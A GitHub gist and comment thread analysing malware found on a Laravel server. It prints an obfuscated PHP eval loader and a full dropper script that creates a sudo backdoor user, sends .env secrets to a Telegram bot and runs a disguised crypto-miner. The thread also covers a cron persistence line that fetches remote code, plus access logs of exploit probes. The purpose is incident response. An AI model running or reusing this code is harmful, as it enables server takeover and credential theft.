Skip to content

Instantly share code, notes, and snippets.

@mp035

mp035/malicious.php

Last active March 8, 2023 14:55
Show Gist options
  • Save mp035/8b39ae853c36f29c936caa44855f617a to your computer and use it in GitHub Desktop.
Save mp035/8b39ae853c36f29c936caa44855f617a to your computer and use it in GitHub Desktop.
Download ZIP
A suspected malicious file found on a php server (throw line added to prevent accidental execution).
Raw
malicious.php
<?php throw new \Exception("This file is likely a malicious file! Do not run it unless you know what you are doing!"); ?>
<?php $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}
.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}
.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
eval($O00O0O("JE8wTzAwMD0iTHdOV2ZheHNCcUNqb3Bkbkh0WVZ2a1VaR0tFck1ibEl5RFFBSnVlZ1JYemlPU1RjRm1QaGlFcktPVlhOYVVlYlRDa0RMbnVaZ3dZRkd5UmhtUGNBempmSnRRTVdzb0JJdlNxSGxwZHhmWkZTU1lFV3FSbEtTWWt2c2ZUOGQzYVRISkNjdTJ4Z0FlSDhpM3N3ZGJFZ2tMQStkTHN6ZGJYMEZqNER2RUNDRkl4Q0gzcmNrZVd3bzBGdHFSWnFLemtwVktYY3QxMEN5b055QWVKV0FHY3B5R3JnSEx3VHRsOUdTWVhsWTFOREZwY05GU2trS3prMFBvYU9QcGxuRlNra2llc09ZMFpTWndaU0t6a1JxMHJacVladlpsOVNxMDlZdDEwV2lJSkRpekhRdGw5R1NZWGxZMU5ERnBjTkZTa2tLemtRdUsxY3QxMEN5b055QWVKV0FlSldBZWFjdTJ4Z0FlSDhGcDlRa2VhYlAyWGdIYjBJRjN0Y0ZLNElkcHgwa0xKNml6OERpSXNPWTBaU1p3WlNLemtxc1p0S3NadE9xd2xyc1Nra2lJSGd0ejR3bzBGdHFSWnFLemtwVktYY3QxMVB0MjV4UEtZRG9TNERkZTlwUDI1MGRiWElISUpnZElIN2VJSldBZWE5RktYQkZvTnlBZUpXQWVKV0FlYWN1MnhnQWVIOEZwOVFrZWFiUDJYZ0hiMElIcFp3QWI1YVkxWVdZd2x0cVpZV3NZWGlBakNmZGU5cFAyNTBkYlhJSElKZ2RJSDdlSUpXQWVhOWVEMHlWS3VUVm9yQkZvZlR0bDlMc1pzUHRCSkVtZWtreVNjN2VwWmJWRzhXdEJYYkZLNTBGb0ErZWJYcFAzdG5BR1pRdTNzNUhHWTlBcDExUExzQ0hHbHprZTlwUDN0bmlLc3hrR1JJQUcxY2tHeGdGajBJWVI5cVplQStlYlhDUERhMWtlYTBNb2FjZFN0cFZLWGNBSWFRdUsxY2RTdHBWS1hjQUlKZ2RXVDhWSzVFa29mV2tMY0VGcTBJSDNaSVBLYzBBSWEydUtYMUZxMElrb2FOUDJsd0FJSmdkV1Q4aTJGZ0hwMCtlYkVna0dmK2RlOTBIYjREdkVDOWVwY3B5R2NCSDJaMHllc09zMFpZS3pIRU1qSkRvU3dDTUVUd3VvcjFlcTBXSDJ4Y1BHWE9Gb3hjdXpXSXUzWnpQZUpuSHpKbmlLY1FIMlpia290Y0FHeDBrTGFCdkk4Z1BvbVFQcFpnUDJrQ1BMRjVpcHJnUFM5MnNLWGVtTHdnSDI5UUZ6YThBR3R4SDJXSXlxTnlGS3JUUHpKRGRHcmNQRHNjSGI0OGtHWjRrR2x6RktSV1BwbG5GcTBJVnBabnVwOTBBSWFiUDJYQmRTQVhycUpJQUx0Z2szbTlBYlJFQUlhQ0ZqMElWcFpudXA5MEFiNERpSXN4SDNZUXRCRWdrR1o0a0dsekZLUitkR3R6ZElIN2VEMHl0R3JUQWowV3UzWnpQbDlDUHBjMHllc09zMFpZS3prNG1MV0RvU3c3QUdyMUhwWE9IMlowUDNhMHllc2JWZUVXZjFaU3FSOWZabDlTc1pzWll3NVlZd2x2WTBGbFlJRVdtU3c3dEx0Y0gzWk5rZUo5QUdyMUhwWE9Gb3hjdXpXd3UyV0N2MloydUtFVHRCOCt0ejR3SHBaQmtLWDB5cU55ZEI0PSI7ICAKICAgICAgICBldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCAgICAKICAgICAgICAkT08wTzAwKCRPME8wMDAsMCwkT08wMDAwKSkpKTs="));?>
@wize-wiz
Copy link

wize-wiz commented Mar 2, 2023
edited
Loading

The link supplied https://ms.neoogilvy.com/vElB0y/song is the actual magic. After a kickstart, it tries to get the content of old.txt on some server that returns a 404.

-- Update: indeed, the vendor/old.txt could actually be the file in the gist.

// old.txt
wget --no-check-certificate http://128.199.245.85/vendor/old.txt -O ./servers.php
--2023-03-02 11:52:05--  http://128.199.245.85/vendor/old.txt
Connecting to 128.199.245.85:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-03-02 11:52:06 ERROR 404: Not Found.

Same goes for the gc (general compiler? Pff who knows).

// gc
curl --insecure https://64.225.3.91/gc -o gc.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:--  0:00:20 --:--:--     0

The curl --insecure https://ms.neoogilvy.com/get/1e7V5c/hhh.txt is some binary, guess it is just a disguise to be run as htop, but it isn't htop so in an ps -ef list you wouldn't find it suspicious if htop is running, which is actually, but anyways.

So it's just guessing what it actually does, but I do think we can say for certain it is something you do not want on your server ;)

-- Update
On other hand, I just read yescryptR32 on the file called htop. yescryptR32 is basically a crypto to mine digital coins, you can read all about it here

The content of https://ms.neoogilvy.com/vElB0y/song.

#!/bin/sh
curl --insecure http://128.199.245.85/vendor/old.txt -o ./servers.php || wget --no-check-certificate http://128.199.245.85/vendor/old.txt -O ./servers.php
curl --insecure http://128.199.245.85/vendor/old.txt -o ./storage/servers.php || wget --no-check-certificate http://128.199.245.85/vendor/old.txt -O ./storage/servers.php
curl --insecure http://128.199.245.85/vendor/old.txt -o ../storage/servers.php || wget --no-check-certificate http://128.199.245.85/vendor/old.txt -O ../storage/servers.php
cd /tmp; curl --insecure https://64.225.3.91/gc -o gc; chmod +x ./gc; ./gc 'useradd brengoz; echo "brengoz:0day.today" | chpasswd; adduser brengoz sudo'
ls -la
getip=$(curl -s monip.org | perl -ne '/IP : ([0-9.]+)/ && print $1')
reverse=$(curl -s --insecure https://api.hackertarget.com/reverseiplookup/?q=$getip > /tmp/reversed.txt)
search=$(find / -name *.env | grep -v 'Permission denied' > /tmp/anu.txt; sed 's/^/cat /;' /tmp/anu.txt > /tmp/gas.sh; chmod +x /tmp/gas.sh; bash /tmp/gas.sh > /tmp/$getip.txt)
MESSAGE=$(cat /tmp/$getip.txt)
rev=$(cat /tmp/reversed.txt)
curl -s -X GET "https://api.telegram.org/bot5144143965:AAHwb1iG6PaEqhPC917-YmMeN_Pur6EXy4Y/sendMessage" -H "application/x-www-form-urlencoded" -d chat_id="-618602250" -d text=""$'\r\n'" $getip "$'\r\n'" $MESSAGE   $rev "
curl -s -F "chat_id=-618602250" -F document=@/tmp/$getip.txt -F text="$MESSAGE" https://api.telegram.org/bot5144143965:AAHwb1iG6PaEqhPC917-YmMeN_Pur6EXy4Y/sendDocument
ulimit -n 65535
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
setenforce 0 2>/dev/null
sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))
curl --insecure https://ms.neoogilvy.com/get/1e7V5c/hhh.txt -o /tmp/htop || wget --no-check-certificate https://ms.neoogilvy.com/get/1e7V5c/hhh.txt -O /tmp/htop
cd /tmp
chmod 777 /tmp/htop
core=$(grep -c processor /proc/cpuinfo)
./htop -a yescryptR32 -o 198.50.168.213:6343 -u D86wNspd8ZxnLdswdWN9XHwkbNvqw2aP1i -p c=DGB --cpu-affinity 0x3 --cpu-priority 5 -t $core --background >/dev/null &
sleep 1
rm -rf /tmp/log-rotate
rm -rf /tmp/kill.sh
rm -rf /tmp/*
rm -rf /var/tmp/*
rm -rf /tmp/proc
rm /tmp/*
rm /var/tmp/*
echo "* * * * * curl --insecure http://192.81.212.131/k | sh" > /tmp/cry
crontab /tmp/cry
rm /tmp/cry
echo "runing....."

@wize-wiz
Copy link

wize-wiz commented Mar 2, 2023
edited
Loading

So what you seriously need to do is to check if you have a user called brengoz, its password is brengoz:0day.today. Remove this user also completely from every sudo list and check if other unknown users have been created.

Secondly, a file called servers.php. They weren't geniuses looking at how they script this bash script, this is seriously amateur work.

@mp035
Copy link
Author

mp035 commented Mar 2, 2023

@wize-wiz I really appreciate you looking at this. When I tried to unwrap it, I must have misread something, because I didn't get as far as you.

I do not have a user called brengoz, the web app user does not have sufficient privileges to create a new user. The file "servers.php" is actually the one in this gist (minus the safety Exception). I would really like to work out how they are getting it on the server. I removed it and it was uploaded again a few days later, so there is a hole somewhere.

@mp035
Copy link
Author

mp035 commented Mar 2, 2023

To be clear, the file in this gist, is [app]/storage/servers.php the [app]/ folder is not writeable by the web app user, so nothing has appeared there.

@wize-wiz
Copy link

wize-wiz commented Mar 2, 2023
edited
Loading

@mp035

  • What Laravel version are you using?
  • What Linux distro
  • Apache or Nginx?
  • Is it a hardened PHP version? Functions like eval, shell_exec etc are blocked?

Either it is being re-uploaded using the same exploit OR .. a script is running as a cronjob writing back that file if it gets deleted.

The parts we can see indeed runs a cronjob every minute using crontab /tmp/cry at this line echo "* * * * * curl --insecure http://192.81.212.131/k | sh" > /tmp/cry at the bottom where content of http://192.81.212.131/k is:

#!/bin/bash
ps aux | grep -v grep | grep 'tmp' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'var' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'wget' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'zergpool.com' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'pool' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'stratum' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'mysqld' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'systemd' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'php-' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'rplant' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'monero' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'bash' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'miner' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'htop' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'top' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'sshd' | awk '{print $2}' | xargs -i kill -9 {}
kill $(pgrep log-rotate)
kill $(pgrep kdevtmp)
kill $(pgrep kinsing)
rm /tmp/*
rm -rf /tmp/*

Where ps aux | grep -v grep | grep 'sshd' | awk '{print $2}' is simply a trick to get the process id and using xargs -i kill -9 {} to kill that process. I have absolutely no clue why this is being run every minute and why killing these processes is so significant.

So what I would do if I were you:

  • Check all crons created by all users, literally all.
  • Scan the logs for access info on the creation date of that particular file servers.php.
  • Deny access for curl and wget for all users.
  • If nothing comes out of the log files, add a watcher on the directory the servers.php file is created, there are several approaches here but there is a lot of info to be found about this topic to get adequate info on how to produce stack-traces for processes responsible for writing a particular file.

@mp035
Copy link
Author

mp035 commented Mar 2, 2023

There was a cron job for the [app] user:

I have disabled "curl" "GET" "lwp-download" "lwp-mirror" "lwp-request" and "wget" for all users.

I will check the logs tomorrow and try to work out how it originally got on the server.

Thank you. I am in your debt.

@wize-wiz
Copy link

wize-wiz commented Mar 3, 2023

Yea that's more like it ;) Who was the user assigned to that job?

Now it's literally back-tracing all steps, good luck and if you find something interesting, let me know :D

Cheers

@mp035
Copy link
Author

mp035 commented Mar 3, 2023

Still haven't checked the logs, but I just wanted to share that there was 9 instances of a process still running:

[app user] 363006 0.0 0.6 230948 13408 ? Ssl Feb16 1:50 ./htop -a yescryptR16 -o 198.50.168.213:6333 -u qpkg4fgnh8a0hhzd2z9g80g4d09j6qnt0sth6l8x7z -p x --cpu-affinity 0x3 --cpu-priority 5 --background

It just occurred to me to check, seeing as you identified that the process was masquerading as htop.

@wize-wiz
Copy link

wize-wiz commented Mar 3, 2023

Yea, it just occurred to me, you could scan the logs quicker by checking the GET parameters 000 and 0x0 located in the script. This seems to be used to activate the script.

@mp035
Copy link
Author

mp035 commented Mar 6, 2023
edited
Loading

It seems the successful execution of servers.php came from a python-requests script, so I went through and isolated all the entries from python-requests:

see below, on 01/Mar/2023:18:15:12:

34.77.127.183 - - [18/Feb/2023:06:11:57 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
34.172.30.85 - - [18/Feb/2023:09:27:13 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
185.224.128.219 - - [18/Feb/2023:15:19:55 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [18/Feb/2023:15:27:50 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [18/Feb/2023:15:40:04 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
20.110.249.240 - - [18/Feb/2023:15:54:43 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
18.208.159.107 - - [18/Feb/2023:17:56:41 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.1"
130.211.54.158 - - [18/Feb/2023:22:10:27 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
185.224.128.219 - - [18/Feb/2023:22:16:41 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [18/Feb/2023:22:32:32 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [18/Feb/2023:23:13:43 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
34.140.248.32 - - [19/Feb/2023:06:28:14 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
185.224.128.219 - - [19/Feb/2023:09:00:25 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [19/Feb/2023:09:16:32 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
34.76.158.233 - - [19/Feb/2023:09:23:30 +0000] "GET / HTTP/1.1" 400 264 "-" "python-requests/2.28.2"
185.224.128.219 - - [19/Feb/2023:09:32:24 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
142.147.89.235 - - [19/Feb/2023:11:55:59 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.27.1"
20.241.59.67 - - [19/Feb/2023:16:22:57 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.224.128.219 - - [19/Feb/2023:19:04:28 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
20.251.12.114 - - [19/Feb/2023:19:11:13 +0000] "GET /.env HTTP/1.1" 400 264 "-" "python-requests/2.28.2"
185.224.128.219 - - [19/Feb/2023:19:21:09 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [19/Feb/2023:19:38:25 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
115.64.229.34 - - [19/Feb/2023:20:36:10 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.18.4"
115.64.229.34 - - [19/Feb/2023:20:36:11 +0000] "GET /core/.env HTTP/1.1" 404 134 "-" "python-requests/2.18.4"
34.76.158.233 - - [19/Feb/2023:21:44:27 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
115.64.229.34 - - [19/Feb/2023:22:18:54 +0000] "GET /.env HTTP/1.1" 404 2316 "-" "python-requests/2.18.4"
115.64.229.34 - - [19/Feb/2023:22:18:56 +0000] "GET /core/.env HTTP/1.1" 404 2316 "-" "python-requests/2.18.4"
20.251.12.114 - - [20/Feb/2023:01:27:00 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.77.127.183 - - [20/Feb/2023:06:23:43 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
185.224.128.219 - - [20/Feb/2023:08:01:53 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [20/Feb/2023:08:09:22 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [20/Feb/2023:08:17:56 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580906 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 614348 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580968 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 198267 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /servers.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /storage/servers.php HTTP/1.1" 200 58 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /asu.php?0day=52.37.113.80/lottery/in HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /suw.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /id.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /fuyuh.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /canary.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /can.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
20.221.197.72 - - [20/Feb/2023:12:58:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.78.6.216 - - [20/Feb/2023:21:57:11 +0000] "GET / HTTP/1.1" 400 264 "-" "python-requests/2.28.2"
34.140.248.32 - - [21/Feb/2023:06:21:02 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
20.251.12.114 - - [21/Feb/2023:07:59:18 +0000] "GET /.env HTTP/1.1" 400 264 "-" "python-requests/2.28.2"
115.64.229.34 - - [21/Feb/2023:08:58:08 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.18.4"
115.64.229.34 - - [21/Feb/2023:08:58:13 +0000] "GET /core/.env HTTP/1.1" 404 134 "-" "python-requests/2.18.4"
115.64.229.34 - - [21/Feb/2023:10:43:42 +0000] "GET /.env HTTP/1.1" 404 2316 "-" "python-requests/2.18.4"
115.64.229.34 - - [21/Feb/2023:10:43:45 +0000] "GET /core/.env HTTP/1.1" 404 2316 "-" "python-requests/2.18.4"
51.38.47.58 - - [21/Feb/2023:10:53:50 +0000] "GET / HTTP/1.1" 200 917 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:52 +0000] "POST / HTTP/1.1" 405 556913 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:55 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580603 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:57 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580657 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:58 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:58 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:58 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 594804 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:59 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580969 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:59 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:54:00 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 579451 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:54:00 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:09 +0000] "GET / HTTP/1.1" 200 917 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:11 +0000] "POST / HTTP/1.1" 405 556913 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:14 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580603 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:16 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580657 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:18 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 595186 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:18 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580969 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:18 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:26 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 579469 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:28 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
20.251.12.114 - - [21/Feb/2023:16:17:09 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.78.6.216 - - [21/Feb/2023:21:15:35 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
20.251.12.114 - - [21/Feb/2023:22:18:12 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
35.233.62.116 - - [22/Feb/2023:06:16:06 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
20.225.133.97 - - [22/Feb/2023:06:51:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 178 "-" "python-requests/2.28.2"
20.225.133.97 - - [22/Feb/2023:06:51:53 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2316 "-" "python-requests/2.28.2"
185.224.128.219 - - [22/Feb/2023:07:08:38 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [22/Feb/2023:07:36:02 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [22/Feb/2023:07:44:21 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
188.166.187.191 - - [22/Feb/2023:09:12:18 +0000] "GET /api/v1 HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
188.166.187.191 - - [22/Feb/2023:09:12:19 +0000] "GET /api/v1 HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
20.127.205.182 - - [22/Feb/2023:11:37:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.26.0"
185.225.74.39 - - [22/Feb/2023:12:10:44 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.1"
147.182.206.223 - - [22/Feb/2023:19:00:44 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.27.1"
147.182.206.223 - - [22/Feb/2023:19:00:44 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.27.1"
147.182.206.223 - - [22/Feb/2023:19:00:45 +0000] "GET /core/.env HTTP/1.1" 404 134 "-" "python-requests/2.27.1"
147.182.206.223 - - [22/Feb/2023:19:00:47 +0000] "GET /core/.env HTTP/1.1" 404 134 "-" "python-requests/2.27.1"
34.77.127.183 - - [22/Feb/2023:21:01:43 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
20.225.133.97 - - [23/Feb/2023:02:29:24 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.140.248.32 - - [23/Feb/2023:06:21:21 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
212.87.204.214 - - [23/Feb/2023:06:53:03 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.25.1"
34.78.6.216 - - [23/Feb/2023:20:46:47 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
34.78.6.216 - - [24/Feb/2023:04:57:13 +0000] "GET / HTTP/1.1" 400 264 "-" "python-requests/2.28.2"
35.195.93.98 - - [24/Feb/2023:06:12:35 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
185.224.128.219 - - [24/Feb/2023:12:37:23 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [24/Feb/2023:12:43:47 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [24/Feb/2023:12:51:15 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
35.195.93.98 - - [24/Feb/2023:20:31:19 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:29 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:29 +0000] "GET /demo/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:29 +0000] "GET /dev/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:30 +0000] "GET /web/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:30 +0000] "GET /api/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:30 +0000] "GET /admin/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:31 +0000] "GET /app/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
20.225.133.97 - - [25/Feb/2023:05:41:58 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
